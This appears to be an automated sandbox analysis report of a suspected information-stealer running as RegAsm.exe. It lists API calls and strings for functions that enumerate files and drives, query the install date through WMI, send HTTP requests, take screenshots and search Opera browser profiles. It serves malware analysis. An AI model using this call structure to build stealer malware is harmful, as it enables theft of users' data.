Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 80daa6067d64a61a9bdbddaea5a93a0b05b476898988918bcf72d07762aa1d2e
Instruction ID: 6b94a13f5f370669ada5eb9711e9097d46dd37664ea70fb643f91c810e4bd080
Opcode Fuzzy Hash: 80daa6067d64a61a9bdbddaea5a93a0b05b476898988918bcf72d07762aa1d2e
Instruction Fuzzy Hash: D4B1B371B093909BEB08DF28CC5461A7BF9BB8A704F078A6DF899D3750D7749904CB89

Function 00415FD1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416018
FindFirstFileA.KERNEL32(?,?), ref: 0041602F
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
wsprintfA.USER32 ref: 00416091
StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
wsprintfA.USER32 ref: 004160C2
wsprintfA.USER32 ref: 004160D9
PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
lstrcatA.KERNEL32(?), ref: 00416125
lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
lstrcatA.KERNEL32(?,?), ref: 0041614A
lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
lstrcatA.KERNEL32(?,?), ref: 00416170
FindNextFileA.KERNEL32(?,?), ref: 004162FF
FindClose.KERNEL32(?), ref: 00416313

Strings

%s\%s, xrefs: 0041608B
%s\%s, xrefs: 004160D3
%s\*, xrefs: 0041600C

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

%d/%d/%d %d:%d:%d, xrefs: 00411943
WQL, xrefs: 0041189A
ROOT\CIMV2, xrefs: 00411862
Unknown, xrefs: 00411985
Unknown, xrefs: 0041196A
InstallDate, xrefs: 004118ED
Select * From Win32_OperatingSystem, xrefs: 00411895
Unknown, xrefs: 00411971

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28

Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

ERROR, xrefs: 00406BAB
GET, xrefs: 00406A42
ERROR, xrefs: 00406AB6

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61

Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041546A
FindFirstFileA.KERNEL32(?,?), ref: 00415481
StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
lstrcatA.KERNEL32(?), ref: 0041550D
lstrcatA.KERNEL32(?), ref: 00415520
lstrcatA.KERNEL32(?,?), ref: 00415534
lstrcatA.KERNEL32(?,?), ref: 00415547
lstrcatA.KERNEL32(?,00436A88), ref: 00415559
lstrcatA.KERNEL32(?,?), ref: 0041556D

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 00415623
FindClose.KERNEL32(?), ref: 00415637

Strings

%s\%s, xrefs: 0041545E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

\*.*, xrefs: 0040BF73
Opera, xrefs: 0040C083
Opera GX, xrefs: 0040C091
Opera Crypto, xrefs: 0040C09F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88

Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE
lstrcpyA.KERNEL32(?,?), ref: 0041520E
lstrcpyA.KERNEL32(?,?), ref: 00415229

Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
lstrlenA.KERNEL32(?), ref: 004152C4

Strings

%DRIVE_REMOVABLE%, xrefs: 00415215
*%DRIVE_FIXED%*, xrefs: 0041515E
*%DRIVE_REMOVABLE%*, xrefs: 0041518F
%DRIVE_FIXED%, xrefs: 00415230

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59

Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

